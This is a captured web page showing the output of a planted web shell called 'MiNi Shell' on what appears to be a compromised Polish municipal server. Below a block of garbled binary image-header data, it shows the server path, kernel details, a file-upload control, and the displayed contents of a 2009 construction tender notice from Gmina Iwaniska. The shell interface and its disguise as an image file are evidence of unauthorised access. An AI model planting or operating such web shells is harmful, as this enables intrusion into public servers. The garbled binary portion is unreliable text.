JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090722/118051-N-2009.html

<p class="kh_header"><b>Iwaniska: Rewitalizacja centrum miejscowości Iwaniska - etap I</b><br>
<b>Numer ogłoszenia: 118051 - 2009; data zamieszczenia: 22.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Iwaniska , ul. Rynek 3, 28-570 Iwaniska, woj. świętokrzyskie, tel. 015 8601254, faks 015 8601240.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja centrum miejscowości Iwaniska - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Rewitalizacja centrum miejscowości Iwaniska - etap I

obejmujący: 
1.   Zagospodarowanie centrum miejscowości Iwaniska
      -   remont budynku świetlicy wiejskiej z przystosowaniem na toalety publiczne
      -   remont parkingu i chodników od ul. Rynek do ul. Opatowskiej 
      -   budowa linii kablowej oświetlenia ulicznego rynku i placu parkingowego przy ulicy 
          Opatowskiej
      -   budowa fontanny w parku
      -   zagospodarowanie terenu zielenią
2.   Przebudowę budynku Gminnej Biblioteki Publicznej wraz z wymianą elementów
      konstrukcyjnych,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.27.10-5, 45.22.33.00-9, 31.52.72.00-8, 45.21.23.30-8, 45.11.27.11-2, 45.30.00.00-0, 45.23.24.40-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią następujące warunki:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym                 i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;  
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2.  Z ubiegania się o udzielenie zamówienia publicznego wyklucza się Wykonawców którzy:

  1)   nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ustawy -
        Prawo zamówień publicznych opisanych w ppkt. 1.1.do 1.4,
  2)   podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy - Prawo
        zamówień publicznych.

3.  Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie złożonych przez 
Wykonawców dokumentów i oświadczeń. 

4.  Zamawiający odrzuca ofertę, która:

1)	jest niezgodna z ustawą,
2)	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt 3 ustawy - Prawo zamówień publicznych,
 3)   jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu  
       nieuczciwej konkurencji,
 4)   zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
 5)   została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie 
       zamówienia,
 6)   zawiera błędy w obliczeniu ceny,
 7)   Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na
       poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy - Prawo zamówień 
       publicznych  
8)	jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej 
     działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy  
     Prawo zamówień publicznych, Wykonawca składa następujące dokumenty

1)   formularz ofertowy z wykorzystaniem wzoru - załącznik nr 2,
2)   aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji   
      działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
      zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy 
      przed upływem terminu składania ofert,
3)   dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają  
      z  przepisów prawa lub innych dokumentów rejestrowych,
4)   aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie
      właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie 
      określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed 
      upływem terminu składania ofert,
5)   aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 
      pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
6)   aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego  
      oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
      Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem 
      podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub
      zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na
      raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - 
      wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
7)   Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych 
      w art. 22 ustawy - Prawo zamówień publicznych - załącznik nr 3, 
8)   Informacja na temat wskazania przez Wykonawcę w ofercie części zamówienia, której 
      wykonanie powierzy podwykonawcom. Jeżeli Wykonawca zamierza powierzyć jakąś część
     robót podwykonawcy, do oferty należy dołączyć oświadczenie, w którym wskaże części 
     zamówienia, którą realizować będzie podwykonawca.

2.   W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje 
      potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, składa następujące
      dokumenty
1)   Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia
      postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  
      w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym
      przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz 
      z dokumentami potwierdzającymi, że roboty zostały wykonane należycie ( protokół odbioru robót 
      lub referencje - oryginał lub kserokopia potwierdzona za zgodność z oryginałem)
      a) co najmniej jedna robota obejmująca następujący zakres prac: przebudowę, remont budynków,
          o wartości co najmniej 1.000.000,00 zł.      
      b) co najmniej jedna robota obejmująca następujący zakres prac: remont chodników i parkingów, 
          budowę oświetlenia ulicznego, budowę obiektów małej architektury (fontanny), 
          zagospodarowanie terenu zielenią, o wartości co najmniej 1.000.000,00 zł.      
2)	Oświadczenie Wykonawcy, że dysponuje osobami posiadającymi uprawnienia i kwalifikacje,                    w tym kierownika budowy z uprawnieniami budowlanymi w specjalności konstrukcyjno - budowlanej, wpisanego na listę członków właściwej izby samorządu zawodowego.  

3.   W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej  
       zapewniającej wykonanie zamówienia, składa następujące dokumenty

1)   informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca
      posiada podstawowy rachunek bankowy, że posiada środki finansowe lub posiada zdolność 
      kredytową na sfinansowanie przedsięwzięcia  o wartości złożonej  oferty, wystawiona nie 
      wcześniej niż 3 miesiące przed upływem terminu składania ofert,
2)	polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest
      ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
      gospodarczej.

4. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w dziale IX pkt. 1, ppkt. 2, 5, 6 składa dokumenty wystawione zgodnie z prawem kraju, w którym  ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że
1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 
       miesięcy przed upływem terminu składania ofert;
2)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie wystawiony nie
      wcześniej niż 6 miesięcy przed upływem terminu składania ofert
       3)   nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub  
             zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie
             na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
             organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania
             ofert.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

5. Dokumenty wymagane w przypadku składania oferty wspólnej

1)   Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla 
     ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania 
     w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
2)  Oferta winna zawierać oświadczenia i dokumenty, o których mowa w dziale IX pkt. 1,  ppkt 2, 
     3, 4, 5, 6 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie. 

6.  Dokumenty dodatkowe 
     Oświadczenie o zastrzeżeniu tajności informacji stanowiących tajemnicę przedsiębiorstwa 
      (jeśli jest taka potrzebna).
     Informacje zawarte w ofercie, stanowiące tajemnicę przedsiębiorstwa w rozumieniu 
     przepisów ustawy o zwalczaniu nieuczciwej konkurencji, co do których Wykonawca 
     zastrzegł, nie później niż w terminie składania ofert, że nie mogą być udostępnione, 
     muszą być oznaczone klauzulą  NIE UDOSTĘPNIAĆ - INFORMACJE STANOWIĄ 
     TAJEMNICĘ PRZEDSIEBIORSTWA W ROZUMIENIU ART. 11 UST. 4 USTAWY 
     O ZWALCZANIU NIEUCZCIWEJ KONKURENCJI (tekst jednolity Dz. U. z 2003 r. nr 153 
      poz. 1503 ze zm.) i załączone jako odrębna część niezłączona z ofertą w sposób trwały.

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę  osoby uprawnione do podpisania oferty z dopiskiem  za zgodność z oryginałem
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

W przypadku załączenia do oferty innych materiałów niż wymagane przez Zamawiającego np. materiałów reklamowych, informacyjnych pożądane jest, aby stanowiły one odrębną część niezłączoną z ofertą w sposób trwały..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http:// iwaniska.pl/bip..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http:// iwaniska.pl/bip.
      Urząd Gminy w  Iwaniskach
      ul. Rynek  3
      27-570  Iwaniska
      Pokój nr  3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2009 godzina 10:00, miejsce: Urząd Gminy w  Iwaniskach
      ul. Rynek  3
      27-570  Iwaniska
      Pokój nr  4 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> do 15.09.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com